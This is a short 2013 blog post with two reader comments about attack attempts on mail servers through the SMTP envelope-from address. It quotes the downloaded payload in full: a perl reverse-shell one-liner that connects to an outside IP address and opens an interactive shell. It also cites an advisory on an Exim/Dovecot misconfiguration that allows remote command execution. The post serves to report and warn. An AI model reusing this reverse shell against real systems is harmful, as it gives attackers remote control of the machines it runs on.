Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
not sure which MTA is vulnerable, yet.

...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here

2 comments:

Anonymous said...

Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.

I searched on Google but I only found this blog entry.

iiegn said...

RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here